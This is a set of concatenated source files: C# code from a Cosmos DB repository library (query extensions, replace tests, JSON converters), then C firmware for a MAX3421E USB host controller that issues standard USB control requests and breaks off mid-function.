                // Cancelled (or any unexpected) status is not modelled by these tests.
                throw new IndexOutOfRangeException($"task.Status '{task.Status}' is not handled");
        }
    }
}
}
<file_sep>using System;
using System.Linq;
using System.Linq.Expressions;
namespace CosmosDbRepository.Implementation
{
/// <summary>
/// IQueryable helpers for optionally applying a predicate or a query-shaping delegate.
/// </summary>
internal static class WhereExtension
{
    /// <summary>Applies <paramref name="predicate"/> when one is supplied; a null predicate leaves the query untouched.</summary>
    public static IQueryable<TSource> ConditionalWhere<TSource>(this IQueryable<TSource> source, Expression<Func<TSource, bool>> predicate)
    {
        if (source is null)
        {
            throw new ArgumentNullException(nameof(source));
        }

        return predicate is null
            ? source
            : source.Where(predicate);
    }

    /// <summary>Runs the optional <paramref name="clauses"/> transform over the query; null means "no transform".</summary>
    public static IQueryable<TSource> ConditionalApplyClauses<TSource>(this IQueryable<TSource> source, Func<IQueryable<TSource>, IQueryable<TSource>> clauses)
    {
        if (source is null)
        {
            throw new ArgumentNullException(nameof(source));
        }

        return clauses is null
            ? source
            : clauses.Invoke(source);
    }

    /// <summary>Runs the mandatory <paramref name="clauses"/> transform; both arguments must be non-null.</summary>
    public static IQueryable<TResult> ApplyClauses<TSource, TResult>(this IQueryable<TSource> source, Func<IQueryable<TSource>, IQueryable<TResult>> clauses)
    {
        if (source is null)
        {
            throw new ArgumentNullException(nameof(source));
        }

        if (clauses is null)
        {
            throw new ArgumentNullException(nameof(clauses));
        }

        return clauses.Invoke(source);
    }
}
}
<file_sep>using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Net;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.StringId
{
[TestClass]
public class CosmosDbRepositoryReplaceTests
    : CosmosDbRepositoryStringTests
{
    // Happy path: add a document, mutate it, and replace it in place.
    [TestMethod]
    public async Task Replace_Expect_Success()
    {
        using (var context = CreateContext())
        {
            var data = new TestData<string>
            {
                Id = GetNewId(),
                Data = "Old Data"
            };

            data = await context.Repo.AddAsync(data);
            data.Data = "New Data";
            await context.Repo.ReplaceAsync(data);
        }
    }

    // Replaying a stale entity must fail with HTTP 412 (PreconditionFailed) --
    // presumably the repository sends an access condition that no longer
    // matches after the first ReplaceAsync succeeds.
    [TestMethod]
    public async Task Replace_Expect_PreconditionFailed()
    {
        using (var context = CreateContext())
        {
            var data = new TestData<string>
            {
                Id = GetNewId(),
                Data = "Old Data"
            };

            data = await context.Repo.AddAsync(data);
            await context.Repo.ReplaceAsync(data);

            var faultedTask = context.Repo.ReplaceAsync(data);
            // NOTE(review): "ShollowException" appears to be a project helper
            // that awaits the task while swallowing its exception -- confirm
            // the intended spelling ("SwallowException"?) at its definition.
            await faultedTask.ShollowException();

            faultedTask.IsFaulted.Should().BeTrue();
            faultedTask.Exception.InnerExceptions.Should().HaveCount(1);
            var dce = faultedTask.Exception.InnerExceptions.Single() as DocumentClientException;
            dce.StatusCode.Should().Be(HttpStatusCode.PreconditionFailed);
        }
    }
}
}
<file_sep>using Newtonsoft.Json;
using Newtonsoft.Json.Converters;
using System;
namespace CosmosDbRepository.Sample
{
/// <summary>Resolution used when (de)serializing epoch timestamps.</summary>
internal enum EpochUnits
{
    Seconds,
    Milliseconds
}
/// <summary>
/// Json.NET converter that serializes <see cref="DateTime"/> values as raw
/// integer offsets (seconds or milliseconds) from the Unix epoch, and reads
/// such offsets back into UTC <see cref="DateTime"/> values.
/// </summary>
internal class EpochConverter
    : DateTimeConverterBase
{
    private static readonly DateTime _epoch = new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc);
    private readonly EpochUnits _units;

    /// <summary>Creates a converter that uses <see cref="EpochUnits.Seconds"/>.</summary>
    public EpochConverter()
        : this(EpochUnits.Seconds)
    {
    }

    /// <summary>Creates a converter using the given epoch <paramref name="units"/>.</summary>
    public EpochConverter(EpochUnits units)
    {
        _units = units;
    }

    /// <summary>Writes the value as a raw integer epoch offset; nulls are skipped.</summary>
    public override void WriteJson(JsonWriter writer, object value, JsonSerializer serializer)
    {
        if (value == null)
        {
            return;
        }

        var elapsed = (DateTime)value - _epoch;

        if (_units == EpochUnits.Seconds)
        {
            writer.WriteRawValue($"{(long)elapsed.TotalSeconds}");
        }
        else if (_units == EpochUnits.Milliseconds)
        {
            writer.WriteRawValue($"{(long)elapsed.TotalMilliseconds}");
        }
        else
        {
            throw new ArgumentException($"Unsupported value of {_units}", nameof(_units));
        }
    }

    /// <summary>Reads an integer epoch offset back into a UTC <see cref="DateTime"/>; null stays null.</summary>
    public override object ReadJson(JsonReader reader, Type objectType, object existingValue, JsonSerializer serializer)
    {
        if (reader.Value == null)
        {
            return null;
        }

        var offset = (long)reader.Value;

        if (_units == EpochUnits.Seconds)
        {
            return _epoch.AddSeconds(offset);
        }

        if (_units == EpochUnits.Milliseconds)
        {
            return _epoch.AddMilliseconds(offset);
        }

        throw new ArgumentException($"Unsupported value of {_units}", nameof(_units));
    }
}
}<file_sep>using System;
using Newtonsoft.Json;
namespace CosmosDbRepository.Types
{
/// <summary>
/// Json.NET converter that (de)serializes <c>DocumentId</c> values as plain
/// JSON strings.
/// </summary>
public class DocumentIdJsonConverter
    : JsonConverter
{
    /// <summary>Only <c>DocumentId</c> itself is handled by this converter.</summary>
    public override bool CanConvert(Type objectType)
    {
        return objectType == typeof(DocumentId);
    }

    /// <summary>Reads a JSON string (or null) back into a <c>DocumentId</c>.</summary>
    public override object ReadJson(JsonReader reader, Type objectType, object existingValue, JsonSerializer serializer)
    {
        if (reader.TokenType == JsonToken.Null)
            return new DocumentId();

        if (reader.TokenType != JsonToken.String)
            // FIX: the message previously said "parsing date" -- a copy/paste
            // from a date converter; this converter parses document ids.
            throw new JsonSerializationException($"Unexpected token parsing id. Expected String, got {reader.TokenType}.");

        // FIX: assign through the implicit string conversion directly instead
        // of first allocating a DocumentId that was immediately overwritten.
        DocumentId documentId = reader.Value.ToString();
        return documentId;
    }

    /// <summary>Writes the wrapped id out as a JSON string.</summary>
    public override void WriteJson(JsonWriter writer, object value, JsonSerializer serializer)
    {
        if (!(value is DocumentId documentId))
            throw new JsonSerializationException($"Unexpected value when converting id. Expected DocumentId, got {value?.GetType().Name ?? "Null"}.");

        writer.WriteValue(documentId.Id);
    }
}
}<file_sep>using System.Collections.Generic;
namespace CosmosDbRepository.Types
{
/// <summary>One page of query results plus the token used to fetch the next page.</summary>
public class CosmosDbRepositoryPagedResults<T>
{
    /// <summary>Opaque continuation token to resume the query from, if any.</summary>
    public string ContinuationToken { get; set; }

    /// <summary>The items in this page; initialized to an empty list.</summary>
    public List<T> Items { get; set; } = new List<T>();
}
}<file_sep>using Newtonsoft.Json;
namespace CosmosDbRepository.Sample
{
/// <summary>Sample DTO for a labelled phone number.</summary>
public class PhoneNumber
{
    // NOTE(review): this property serializes as "Number" (PascalCase) while
    // Type serializes as "type" (camelCase).  The mismatch looks accidental,
    // but stored documents depend on these names -- confirm before changing.
    [JsonProperty(PropertyName = "Number")]
    public string Number { get; set; }

    [JsonProperty(PropertyName = "type")]
    public string Type { get; set; }

    /// <summary>Formats as "type: number" for display.</summary>
    public override string ToString() => $"{Type}: {Number}";
}
} | df287513bafd10c94f81239d5d500166cf02aac8 | [
"Markdown",
"C#"
] | 52 | C# | trbenning/CosmosDbRepository | 5fe3b1199811e34bdfb9b462f0670c8304ee4d42 | c03bf44cdcf344c70158eca3c75f83d1bb436dc3 |
refs/heads/master | <repo_name>Abe-Tsang/exampleTrade<file_sep>/src/Driver.java
public class Driver {
public static void main(String[] args){
User buyer = new User("Abe");
User seller = new User("Tsang");
seller.postItem("Item1", 50, 2);
seller.postItem("Item2", 100, 3);
buyer.buyItem("Item2", 1);
System.out.println(seller.inventoryToString());
}
}
| 442d2b460f8d7c483202b969387765207873898a | [
"Java"
] | 1 | Java | Abe-Tsang/exampleTrade | fe5764ac5ab9f1409f736480a34e30e24563865b | 4497c5bc45aaec974d2ba65bc8ee0d6a3eb5b0e6 |
refs/heads/master | <repo_name>itqpleyva/abstractFactoryPattern<file_sep>/src/main/java/com/itqpleyva/abstractfactorypattern/UIClases/MacCheckbox.java
package com.itqpleyva.abstractfactorypattern.UIClases;
import com.itqpleyva.abstractfactorypattern.interfaces.Checkbox;
public class MacCheckbox implements Checkbox {
@Override
public void paint() {
System.out.println("I am a Mac Checkbox");
}
}<file_sep>/src/main/java/com/itqpleyva/abstractfactorypattern/AbstractFactoryPatternApplication.java
package com.itqpleyva.abstractfactorypattern;
import com.itqpleyva.abstractfactorypattern.Applications.Application;
import com.itqpleyva.abstractfactorypattern.factories.GuiFactory;
import com.itqpleyva.abstractfactorypattern.factories.MacFactory;
import com.itqpleyva.abstractfactorypattern.factories.WindowsFactory;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class AbstractFactoryPatternApplication {
static GuiFactory factory;
static Application app;
public static void main(final String[] args) {
SpringApplication.run(AbstractFactoryPatternApplication.class, args);
String os_name = System.getProperty("os.name").toLowerCase();
if (os_name.contains("mac")) {
factory = new MacFactory();
app = new Application(factory);
}
else{
factory = new WindowsFactory();
app = new Application(factory);
}
app.paint();
}
}
<file_sep>/src/main/java/com/itqpleyva/abstractfactorypattern/interfaces/Checkbox.java
package com.itqpleyva.abstractfactorypattern.interfaces;
public interface Checkbox {
void paint();
} | 938941185d9c4715f8754ec1a67d1285960bab6c | [
"Java"
] | 3 | Java | itqpleyva/abstractFactoryPattern | a1ca15d87cb51bede06e5109d0cc50194307394b | 9e1ac895718236ffce503ae2717e0097134ac935 |
refs/heads/master | <repo_name>JopperTom/MaxUSB<file_sep>/My Code/usb.h
#ifndef USB_H
#define USB_H
#define BUFSIZ 8
BYTE INTERRUPT;
int FLAG, FRAMECOUNT, CURRENT, NEXT;
BYTE errorcode;
BYTE HR1,HR2,HR3;
const SUD addr4 = {0x00,0x05,0x04,0x00,0x00,0x00,0x00,0x00};
const SUD conf1 = {0x00,0x09,0x01,0x00,0x00,0x00,0x00,0x00};
const SUD idle = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00};
BYTE CTL_WRITE(void);
void Host_Init( void );
typedef struct {
BYTE bLength;
BYTE bDescriptorType;
BYTE bcdUSB[2];
BYTE bDeviceClass;
BYTE bDeviceSubClass;
BYTE bDeviceProtocol;
BYTE bMaxPacketSize;
BYTE idVendor[2];
BYTE idProduct[2];
BYTE bcdDevice[2];
BYTE iManufacture;
BYTE iProduct;
BYTE iSerialNumber;
BYTE bNumConfigurations;
} DEVICE_DESCR;
typedef struct {
BYTE bLength;
BYTE bDescriptorType;
BYTE wTotalLength[2];
BYTE bNumInterfaces;
BYTE bConfigurationValue;
BYTE iConfiguration;
BYTE bmAttributes;
BYTE bMaxPower;
} CONFIG_DESCR;
typedef struct {
BYTE bLength;
BYTE bDescriptorType;
BYTE bInterfaceNumber;
BYTE bAlternateSetting;
BYTE bNumEndpoints;
BYTE bInterfaceClass;
BYTE bInterfaceSubClass;
BYTE bInterfaceProtocol;
BYTE iInterface;
} INTERFACE_DESCR;
typedef struct {
BYTE bLength;
BYTE bDescriptorType;
BYTE bEndpoinAddress;
BYTE bmAttributes;
BYTE wMaxPacketSize;
BYTE bInterval;
} ENDPOINT_DESCR;
typedef struct {
SUD address;
SUD config;
SUD idle;
// DEVICE_DESCR device_descr;
// CONFIG_DESCR config_descr;
// INTERFACE_DESCR interface_descr;
// ENDPOINT_DESCR endpoint_1;
} DEVICE;
int Connect_Device( DEVICE * );
DEVICE *Open_Device( void );
void Close_Device( DEVICE *device );
void Configure_Device( DEVICE *device,
const SUD address,
const SUD config,
const SUD idle);
void Configure_Hub( DEVICE *device,
const SUD address,
const SUD config,
const SUD idle);
int host_send_data( unsigned char c, DEVICE *device );
int host_recv_data( DEVICE *device );
int FRAME = 0;
BYTE Check_INT(void);
void StallEP0(void);
void Bus_Reset(void);
void Bus_Resume(void);
void Reset_MAX(int);
BYTE Wait_for_HIRQ(BYTE regbit);
void Ack_Status(void);
BYTE readstat(void);
void wregAS16(BYTE reg,BYTE dat);
void std_request(void);
void class_request(void);
void vendor_request(void);
void send_descriptor(void);
// Host-specific
BYTE check_HRSL(void);
BYTE CTL_WRITE(void);
BYTE CTL_READ(void);
void waitframes(int num);
BYTE Set_Address(BYTE addr);
BYTE Get_Device_Status(void);
BYTE H_GetStat(BYTE port);
BYTE HubPort_Feature(BYTE setnotclr,BYTE feat,BYTE port);
BYTE Set_Idle(BYTE iface, BYTE duration, BYTE reportID);
BYTE Set_Config(BYTE cfgval);
BYTE Get_Descriptor(BYTE type,WORD length);
//void Get_Descriptor(BYTE, DEVICE*);
void Set_Descriptor(BYTE, DEVICE*);
//void Get_Descriptor(BYTE, DEVICE*);
void Get_Configuration( DEVICE* );
void Set_Configuration( DEVICE* );
//void Get_Interface( DEVICE* );
//void Set_Interface( DEVICE* );
// SPI_x.C prototypes
void set_addr(void);
void send_keystroke(BYTE);
void feature(BYTE);
void get_status(void);
void set_interface(void);
void get_interface(void);
void set_configuration(void);
void get_configuration(void);
BYTE H_D_GetStat(void);
#endif
<file_sep>/My Code/settings/RT53_Test_Bench.ini
[WorkspaceWindow]
ExpandedNodes=_ 10 "<ws>" "connect_test" "connect_test/connect_test.c" "connect_test2" "foo" "hst_LS_KBD_NOHUB" "hst_LS_KBD_NOHUB/hst_LS_KBD_NOHUB.c" "read_bytes" "simple_test" "simple_test2" 8 "simple_test/Debug" "connect_test/Debug" "read_bytes/Debug" "connect_test2/Debug" "hst_LS_KBD_NOHUB/Debug" "hst_LS_HUB_KBD/Debug" "foo/Debug" "simple_test2/Debug" "<ws>/hst_LS_HUB_KBD"
SelectedTab=_ 1
[Desktop-Workspace]
Wnd0=_ "TextEditor" "open" 44 0 2 160 882 -1 -1 1280 4 2372 913 "H:\maxim-ic\Maxim USB\My Code\usb.c" 1 1 0 0 6375 6375
Wnd1=_ "TextEditor" "open" 44 0 2 480 858 -1 -1 1354 30 2208 885 "H:\maxim-ic\Maxim USB\My Code\interface.c" 1 1 0 154 5280 5280
Wnd2=_ "TextEditor" "open" 44 0 2 0 882 -1 -1 11 21 617 557 "H:\maxim-ic\Maxim USB\My Code\usb.h" 1 1 0 67 2240 2240
Wnd3=_ "Messages2" "open" 44 0 1 -1 -1 -4 -30 0 700 1264 877 5 "Build\Messages" 1193 "Find in Files\Line" 59 "Find in Files\Path" 357 "Find in Files\String" 715 "Tool Output\Output" 1176
Wnd4=_ "Workspace2" "open" 44 0 1 -1 -1 -4 -30 0 0 352 608 276 27 27
Maximized=_ 0
Count=_ 5
<file_sep>/My Code/Copy of usb.c
#ifndef USB_C
#define USB_C
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // ditto
#include "..\usb.h"
#include "..\interface.c"
#include "RT53reg.h"
// Drive a USB bus reset: arm the bus-event interrupt, command the SIE to
// start the reset, then block until the chip reports completion.
void Bus_Reset(void)
{
    wreg(rHIEN,bmBUSEVENTIE);       // enable the reset done irq
    wreg(rHCTL,bmBUSRST);           // initiate the 50 msec bus reset
    Wait_for_HIRQ(bmBUSEVENTIRQ);   // wait for, and then clear this interrupt
    wreg(rHIEN,0x00);               // all ints disabled again
}

// Drive a USB bus resume; same handshake pattern as Bus_Reset but with the
// resume command bit.
void Bus_Resume(void)
{
    wreg(rHIEN,bmBUSEVENTIE);       // enable the resume done irq
    wreg(rHCTL,bmBUSRSM);           // initiate the 20 msec bus resume
    Wait_for_HIRQ(bmBUSEVENTIRQ);   // wait for, and then clear this interrupt
    wreg(rHIEN,0x00);               // all ints disabled again
}

// Pulse the chip-reset bit of the USB controller with settling delays on
// either side.  Applies to MAX3420E or MAX3421E.
// NOTE(review): the "time" parameter is unused -- delays are hard-coded to
// 500/2000; confirm whether callers expect it to be honored.
void Reset_MAX(int time)
{
    // int k;
    wreg(rUSBCTL,0x20);             // assert chip reset
    timeDELAY(500);                 // a delay while reset is held
    wreg(rUSBCTL,0x00);             // remove the reset
    timeDELAY(2000);                // a longer delay after releasing reset
}
//periph
// Build a SET_ADDRESS(addr) setup packet in SUDFIFO and run it as a
// control-write to address 0 (the device's address before it is assigned).
// Returns the CTL_WRITE() completion code (0 = success).
BYTE Set_Address(BYTE addr)
{
    wreg(rSUDFIFO,0x00);        // bmRequestType: OUT, standard, to device
    wreg(rSUDFIFO,0x05);        // bRequest = SET_ADDRESS
    wreg(rSUDFIFO,addr);        // wValueL = new address
    wreg(rSUDFIFO,0x00);        // wValueH
    wreg(rSUDFIFO,0x00);        // wIndexL
    wreg(rSUDFIFO,0x00);        // wIndexH
    wreg(rSUDFIFO,0x00);        // wLengthL
    wreg(rSUDFIFO,0x00);        // wLengthH (no data stage)
    //
    wreg(rPERADDR,0x00);        // send to address 0
    return CTL_WRITE();         // return its error code
}

//
// DEVICE: Get_Status -- requests the two device status bytes.
//
BYTE Get_Device_Status(void)
{
    wreg(rSUDFIFO,0x80);        // 10000000 IN, STD REQ, to Device
                                // (comment fixed: bit7=1 is device-to-host)
    wreg(rSUDFIFO,0x00);        // 0 is Get_Status
    wreg(rSUDFIFO,0x00);
    wreg(rSUDFIFO,0x00);
    wreg(rSUDFIFO,0x00);
    wreg(rSUDFIFO,0x00);
    wreg(rSUDFIFO,0x02);        // wLengthL: ask for two bytes
    wreg(rSUDFIFO,0x00);
    return CTL_READ();
}

//
// HUB: get hub/port status. If port=0, returns hub status.
// The status/change bytes are delivered by the IN data stage (see the
// CTL_READ note: the FIFO is left for the caller to drain).
// Returns the result code for the CTL-RD transfer (0=no errors).
BYTE H_GetStat(BYTE port)
{
    wreg(rSUDFIFO,0xA3);        // 10100011 IN, class request, "other" recipient
    wreg(rSUDFIFO,0x00);        // bRequest = GET_STATUS
    wreg(rSUDFIFO,0x00);        // wValueL
    wreg(rSUDFIFO,0x00);        // wValueH
    wreg(rSUDFIFO,port);        // wIndexL = port (0 selects the hub itself)
    wreg(rSUDFIFO,0x00);        // wIndexH
    wreg(rSUDFIFO,0x04);        // wLengthL: four bytes of status+change
    wreg(rSUDFIFO,0x00);        // wLengthH
    return CTL_READ();
}

// HUB: Set_Feature (setnotclr!=0) or Clear_Feature on a hub port.
BYTE HubPort_Feature(BYTE setnotclr,BYTE feat,BYTE port)
{
    wreg(rSUDFIFO,0x23);                    // OUT, class request, "other" (port)
    wreg(rSUDFIFO, setnotclr ? 0x03:0x01);  // Set_Feature or Clear_Feature
    wreg(rSUDFIFO,feat);                    // wValueL = feature selector
    wreg(rSUDFIFO,0x00);                    // wValueH
    wreg(rSUDFIFO,port);                    // wIndexL = port number
    wreg(rSUDFIFO,0x00);                    // wIndexH
    wreg(rSUDFIFO,0x00);                    // wLengthL
    wreg(rSUDFIFO,0x00);                    // wLengthH
    return CTL_WRITE();
}

// HID SET_IDLE: limit how often the keyboard resends unchanged reports.
// Set_Idle[8] = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00};
BYTE Set_Idle(BYTE iface, BYTE duration, BYTE reportID)
{
    wreg(rSUDFIFO,0x21);    // bmRequestType=Output, class request, directed to interface
    wreg(rSUDFIFO,0x0A);    // SET_IDLE
    wreg(rSUDFIFO,reportID);// wValueL
    wreg(rSUDFIFO,duration);// wValueH
    wreg(rSUDFIFO,0x00);    // wIndexL
    wreg(rSUDFIFO,iface);   // wIndexH -- NOTE(review): HID puts the interface
                            // number in the LOW byte of wIndex; this only
                            // behaves while iface==0.  Confirm before reuse.
    wreg(rSUDFIFO,0x0);     // wLengthL
    wreg(rSUDFIFO,0x0);     // wLengthH
    return CTL_WRITE();
}

// Standard SET_CONFIGURATION(cfgval).
BYTE Set_Config(BYTE cfgval)
{
    wreg(rSUDFIFO,0x00);    // bmRequestType=Output, std request, directed to device
    wreg(rSUDFIFO,0x09);    // SET_CONFIG
    wreg(rSUDFIFO,cfgval);  // wValueL
    wreg(rSUDFIFO,0x00);    // wValueH
    wreg(rSUDFIFO,0x00);    // wIndexL
    wreg(rSUDFIFO,0x00);    // wIndexH
    wreg(rSUDFIFO,0x0);     // wLengthL
    wreg(rSUDFIFO,0x0);     // wLengthH
    return CTL_WRITE();
}

// Standard SET_INTERFACE(interface, altsetting).
BYTE Set_Interface(BYTE interface, BYTE altsetting)
{
    wreg(rSUDFIFO,0x00);        // bmRequestType=Output, std request, directed to device
    wreg(rSUDFIFO,0x0B);        // SET_INTERFACE (comment fixed; was "SET_CONFIG")
    wreg(rSUDFIFO,altsetting);  // wValueL=alternate setting
    wreg(rSUDFIFO,0x00);        // wValueH=0
    wreg(rSUDFIFO,interface);   // wIndexL=Interface number
    wreg(rSUDFIFO,0x00);        // wIndexH
    wreg(rSUDFIFO,0x0);         // wLengthL
    wreg(rSUDFIFO,0x0);         // wLengthH
    return CTL_WRITE();
}
// Get_Descriptor_Device[8] = {0x80,0x06,0x00,0x01,0x00,0x00,0x40,0x00};
// Issue a GET_DESCRIPTOR control-read for the given descriptor type.
//   type:   descriptor type code placed in wValueH (index fixed at 0).
//   length: number of bytes requested (wLength).
// Returns the CTL_READ() completion code (0 = success).
BYTE Get_Descriptor(BYTE type,WORD length)
{
    wreg(rSUDFIFO,0x80);        // bmRequestType=Input, Std request, directed to device
    wreg(rSUDFIFO,0x06);        // GET_DESCRIPTOR
    wreg(rSUDFIFO,0x00);        // wValueL = descriptor index
    wreg(rSUDFIFO,type);        // wValueH = descriptor type
    wreg(rSUDFIFO,0x00);        // wIndexL
    wreg(rSUDFIFO,0x00);        // wIndexH
    // BUGFIX: wLength is little-endian in a USB SETUP packet -- the low byte
    // goes into the FIFO first.  The original wrote MSB(length) into the
    // wLengthL slot (and its comments labelled the bytes backwards too).
    wreg(rSUDFIFO,LSB(length)); // wLengthL
    wreg(rSUDFIFO,MSB(length)); // wLengthH
    return CTL_READ();
}
#ifdef HST
//periph 15.1.3
// **** CONTROL-Write transfer with no OUT data stage. ****
// 0. Before calling this function, load the SUDFIFO with the 8 setup bytes, and PERADDR with the address.
// 1. This function sends a SETUP token to fnaddr, EP=0, then a DATA0 PID with the 8 setup bytes in SUDFIFO.
// If the transfer error code is nonzero, the function exits with the return value of 1x, where x
// is the RT53 error code.
// 2. If no error, sends an IN handshake to fnaddr, EP=0. By setting the IN and HS bits, the SIE
// automatically checks for the correct peripheral response--an empty DATA1 packet--and ACKS it.
// If the transfer error code is nonzero, the function exits with the return value of 2x, where x
// is the RT53 error code.
//
// **** CONTROL-Write transfer with no OUT data stage ****
// Pre-conditions: the 8 setup bytes are already in SUDFIFO and PERADDR
// holds the target device address.
// Phase 1 sends the SETUP token + DATA0 payload; phase 2 finishes with an
// IN status handshake, retrying while the device NAKs.
// Returns 0 on success, or 0x20 + the 4-bit HRSL result code on failure.
// NOTE(review): the phase-1 error check is commented out (the "//tt" lines),
// so a failed SETUP stage only surfaces indirectly in phase 2 -- confirm.
BYTE CTL_WRITE(void) // call with SUDFIFO loaded with 8 bytes and PERADDR=device address
{
    static BYTE errorcode;
    // Phase 1. Send the SETUP token and 8 setup bytes. Device should immediately ACK.
    wreg(rHXFR,tokSETUP);
    //errorcode = check_HRSL();     // check_HRSL() waits for any interrupt and returns host result code
    //tt errorcode = Wait_for_HIRQ(bmHXFRDNIRQ);
    //tt if (errorcode)
    //tt return 0x10 + errorcode;   // it's nonzero. The 0x10 indicates first xfr phase
    // Phase 2. Send IN handshakes until we get the DATA1 PID (expect NAKs)
    do
    {
        wreg(rHXFR,bmHS);           // [*** was A0, now 80h]
        // errorcode = check_HRSL();
        errorcode = Wait_for_HIRQ(bmHXFRDNIRQ);
    }
    while (errorcode == hrNAK);     // Try again if a NAK
    if (errorcode)
        return 0x20 + errorcode;    // 0x20 indicates second xfr phase
    return(0);                      // success
}
//periph 15.1.2
// **** CONTROL-Read transfer
// Before calling, load SUDFIFO with the command request.
// The function sends the SETUP packet, then an IN packet, then reads the IN data
// into the RCVFIFO.
// Returns 0x00 on success, or 0xXN where X is 0x80, 0x90, etc. & n is the 4-bit HRSL error code.
// On exit, the RCVBC reg indicates the byte count, and the IN data is in the RCVFIFO.
//
//
// **** CONTROL-Read transfer ****
// Pre-condition: the 8-byte request is already loaded into SUDFIFO.
// Sends the SETUP stage, an IN data stage, then an OUT status handshake.
// Returns 0 on success, or 0x80/0x90/0xA0 + the 4-bit HRSL code so the
// caller can tell which stage failed.
// NOTE(review): step 3 (copying the IN data out of RCVFIFO and clearing
// RCVDAVIRQ) is commented out, so the received bytes are left in the FIFO
// for the caller to drain -- confirm all callers do so.
BYTE CTL_READ(void)
{
    static BYTE dum, errorcode;
    //BYTE dum,errorcode,xlen;
    // 0. Load the SUDFIFO
    //writebytes(rSUDFIFO,8,pSUD);
    // 1. Send a SETUP token to addr 0, ep0, followed by a DATA0 PID and the 8 setup bytes in SUDFIFO.
    //    The SIE always sends DATA0 for SETUPs, so no toggle initialization is needed.
    wreg(rHIEN,bmHXFRDNIE);         // enable the host transfer done interrupt
    wreg(rHXFR,bmSETUP);            // trigger the transfer--SIE handles SETUP and DATA stages. EP=0.
    errorcode = check_HRSL();       // waits for HXFRDN IRQ and returns host result code
    if (errorcode)
        return (0x80+errorcode);
    // 2. Send an IN token to addr0, ep0.
    dum = rreg(rHIRQ);              // 0x68 FRAME, CONN, SNDBAV
    SETBIT(rHCTL,bmRCVTOG1);        // expect a DATA1 packet
    wreg(rHXFR,0x00);               // IN token to fnaddr, EP0
    errorcode = check_HRSL();
    if (errorcode)
        return (0x90+errorcode);
    // 3. (disabled) read the byte count and copy the FIFO contents out.
    //dum = rreg(rHIRQ);            // 0x6C +++ FRAME CONN SNDBAV RCVDAV
    //xlen = rreg(rRCVBC);          // get the byte count ??? ERROR xlen=0, not 8
    //readbytes(rRCVFIFO,xlen ,PeriphBytes);
    //SETBIT(rHIRQ,bmRCVDAVIRQ);    // clear the IRQ (and rRCVBC register)
    // 4. OUT packet as the status handshake.
    wreg(rHXFR,(bmOUTNIN | bmHS));
    errorcode = check_HRSL();
    if (errorcode)
        return (0xA0+errorcode);
    //
    return (0);                     // no errors
}
/*
//
BYTE Wait_for_HIRQ(BYTE regbit)
{
static BYTE result;
wreg(rHIEN,regbit); // enable only one IRQ in the HIEN register
result = regbit;
while( FLAG <= 0 ); // hang until an irq
FLAG = 0;
// wreg(rHIRQ,regbit); // clear the irq
wreg(rHIEN,0x00); // all ints off
result = rreg(rHRSL); // get the completion code
return (result & 0x0F); // 4 LSB only
}
*/
/*
BYTE check_HRSL(void) // wait for the HXFRDN IRQ, then read and return the result
{
BYTE done;
done = 0;
wreg(rHIEN,bmHXFRDNIE); // enable only this interrupt
while(!done)
{
while( FLAG == 0 ) ; // hang until an irq
if(rreg(rHIRQ) & bmHXFRDNIRQ) // is it the HXFRDN IRQ?
{
wreg(rHIRQ,bmHXFRDNIRQ); // clear the irq
done = 1;
}
}
wreg(rHIEN,0x00); // disable all interrupts
return (rreg(rHRSL) & 0x0F); // 4 LSB of completion code
}
*/
// Purpose: To remain in a loop until the FRAMEIRQ decrements a global variable to zero.
// Purpose (per the original author): remain in a loop until the FRAMEIRQ
// ISR decrements FRAMECOUNT from "num" to zero, i.e. wait that many SOF
// frames.
// NOTE(review): the counting logic is commented out below -- as written the
// function only enables FRAMEIE and immediately disables it again, so it
// does NOT actually wait.  Callers that rely on this for pacing (e.g.
// Read_Keypad) are effectively unpaced until this is restored.
void waitframes(int num)
{
    // BYTE temp;
    //// FLAG = 0;
    //FRAMECOUNT = num;
    // temp = rreg( rHIEN );        // retrieve currently active interrupts
    wreg( rHIEN, bmFRAMEIE );       // enable only the frame interrupt
    // timeDELAY(500);              // a delay
    // while( FRAMECOUNT >= 0 );    // loop until zero
    wreg( rHIEN, 0x00 );            // disable all interrupts
}
/*
#pragma vector = 1 // Module 1 Vector
__interrupt void interrupt_service_routine()
{
// Has INT12 been triggered?
if ( EIF1_bit.IE12 ) // IE12 EIF1.4
{
// Loop while a valid interrupts exists
if( INTERRUPT = (rreg( rHIRQ ) & 0xF7) )
{
// Check which host interrupt
if ( INTERRUPT & bmBUSEVENTIRQ ) // [bus reset + 50mSec] or [bus resume + 20mSec]
{
FLAG = bmBUSEVENTIRQ;
wreg( rHIRQ, bmBUSEVENTIRQ); // clear this irq
}
else if ( INTERRUPT & bmRSMREQDETIRQ ) // Bus Resume Request Detected
{
FLAG = bmRSMREQDETIRQ;
wreg( rHIRQ, bmRSMREQDETIRQ ); // clear this irq
}
else if ( INTERRUPT & bmRCVDAVIRQ ) // Receiver FIFO contains Data
{
FLAG = bmRCVDAVIRQ;
wreg( rHIRQ, bmRCVDAVIRQ ); // clear this irq
}
else if ( INTERRUPT & bmSUSPENDDNIRQ ) // Suspend generation Done
{
FLAG = bmSUSPENDDNIRQ;
wreg( rHIRQ, bmSUSPENDDNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmCONNIRQ ) // State of Connection Changed
{
FLAG = bmCONNIRQ;
switch ( rreg(rHRSL) & bmKSTATUS & bmJSTATUS )
{
case 0x00 : // SE0 - EOP or disconnect
break;
case bmKSTATUS :
break;
case bmJSTATUS :
break;
default :
// error
break;
}
wreg( rHIRQ, bmCONNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmFRAMEIRQ ) // begin SOF Packet
{
FRAMECOUNT--;
FLAG = 64;
wreg( rHIRQ, bmFRAMEIRQ ); // clear the IRQ
}
else if ( INTERRUPT & bmHXFRDNIRQ ) // Host Transfer Done
{
FLAG = bmHXFRDNIRQ;
wreg( rHIRQ, bmHXFRDNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmSNDBAVIRQ ) // Send Buffer Available
{
// static BYTE dummy;
//FLAG = 8;
wreg( rHIRQ, bmSNDBAVIRQ ); // clear this irq
